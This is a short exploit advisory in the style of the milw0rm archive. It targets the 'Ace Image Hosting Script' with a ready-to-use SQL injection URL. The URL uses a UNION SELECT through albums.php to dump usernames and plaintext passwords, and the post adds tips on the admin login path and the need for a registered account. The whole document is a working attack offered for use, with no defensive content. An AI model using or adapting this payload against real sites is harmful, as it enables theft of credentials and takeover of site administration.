--==+================================================================================+==-- --==+ Ace Image Hosting Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: N/A DORK: N/A DESCRIPTION: pull user's info from the database EXPLOITS: www.site.com/albums.php?mode=editalbum&id=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(user,char(58),password),3/**/FROM/**/users/**/LIMIT/**/0,1/* NOTE/TIP: admin login is at /admin/ passwords are in plaintext you MUST create a account and login before the injection will work GREETZ: milw0rm.com, h4ck-y0u.org ! --==+================================================================================+==-- --==+ Ace Image Hosting Script SQL Injection Vulnerbility +==-- --==+================================================================================+==--